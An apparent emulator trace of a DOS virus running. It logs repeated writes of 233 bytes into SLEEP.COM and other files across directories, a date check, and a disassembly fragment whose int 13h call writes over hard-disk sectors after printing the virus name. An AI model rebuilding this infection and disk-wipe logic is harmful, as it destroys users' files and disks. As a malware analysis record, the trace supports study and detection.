2018-12-25T12:39:19.840302774Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.841846439Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.845470888Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.861449011Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.862995783Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.864517726Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.867561937Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.869723897Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.871437242Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.874403754Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.875937823Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.877471826Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.88017308Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.881659962Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.882983755Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.884854828Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.886155415Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.887409255Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.88903778Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.89090685Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.892572189Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.894227709Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.896378394Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.897907083Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.899416512Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.901413315Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.902612673Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.903880883Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.905658412Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.907207875Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.908735214Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.91064927Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.912091794Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.913604943Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.916020351Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.917332573Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.918658506Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.920851887Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.922279243Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.923668668Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.925669707Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.92720216Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.928832842Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.931354182Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.933137973Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.934634629Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.936346593Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.938352441Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.939485048Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.940552618Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.94199336Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.943290259Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.944895601Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.947036008Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.948761973Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.950396944Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.952847548Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.954638267Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.956428826Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.958849476Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.960433683Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.962084226Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.964607877Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.966178672Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.967713521Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.969801534Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.971087869Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.972342093Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.974537639Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.975828731Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.977014154Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.979018881Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.980678153Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.982198109Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.983688318Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.98579431Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.986874145Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.98796338Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.990861443Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.992560481Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.994108342Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.996841683Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.998588699Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:20.000358654Z 78 PC: 12aa6 | Find first file
2018-12-25T12:39:20.0085118Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:20.016207247Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-25T12:39:20.023955116Z 62 PC: 12abf | Close file
2018-12-25T12:39:20.039445954Z 79 PC: 12ac9 | Find next file
2018-12-25T12:39:20.043040271Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.050718923Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.058694655Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.069094402Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.072401351Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.080004906Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.088860129Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.0977403Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.101053641Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.109712647Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.117624568Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.126443591Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.131366503Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.139640805Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.148235451Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.157504901Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.16113655Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.168836911Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.178832473Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.189880965Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.193921067Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.202029251Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.210456963Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.21990282Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.223398958Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.2323369Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.235925859Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.244856335Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.248801836Z 59 PC: 12ad2 | Change current directory
2018-12-25T12:39:20.253781227Z 78 PC: 12aa6 | Find first file (See above)
2018-12-25T12:39:20.261465993Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.270318611Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.273843772Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.282704546Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.28709513Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.294734991Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.298210931Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.307973422Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.312012859Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.319628179Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.324760423Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.334030227Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.337321939Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.345489701Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.349205195Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.35811531Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.361555177Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.370020005Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.37338982Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.382108046Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.385811312Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.394104341Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.400974899Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.411653908Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.414950649Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.42217317Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.425920863Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.434461729Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.437370482Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.44494202Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.447964208Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.457126599Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.460478342Z 59 PC: 12ad2 | Change current directory (See above)
2018-12-25T12:39:20.465089107Z 42 PC: 12ad9 | Get date 0x12ad9: mov dl, 0
0x12adb: cmp al, dl
0x12add: jne 0x12b55
0x12adf: mov ax, cs
0x12ae1: mov ds, ax
0x12ae3: mov ah, 9
0x12ae5: mov dx, 0x126
0x12ae8: int 0x21
0x12aea: mov ax, 0x440d
0x12aed: mov cx, 0x84b
0x12af0: mov bh, 0
0x12af2: xor dx, dx
0x12af4: int 0x21
0x12af6: xor dx, dx
0x12af8: mov cx, 2
0x12afb: mov ax, 0x311
0x12afe: mov dl, 0x80
0x12b00: mov bx, 0x3000
0x12b03: mov es, bx
0x12b05: int 0x13
2018-12-25T12:39:20.467833184Z 9 PC: 12aea | Display string (String= 'virusname is:mainmanII,return of the lamervirus')
2018-12-25T12:39:20.473298066Z 68 PC: 12af6 | I/O control for devices (Set for = '� ��')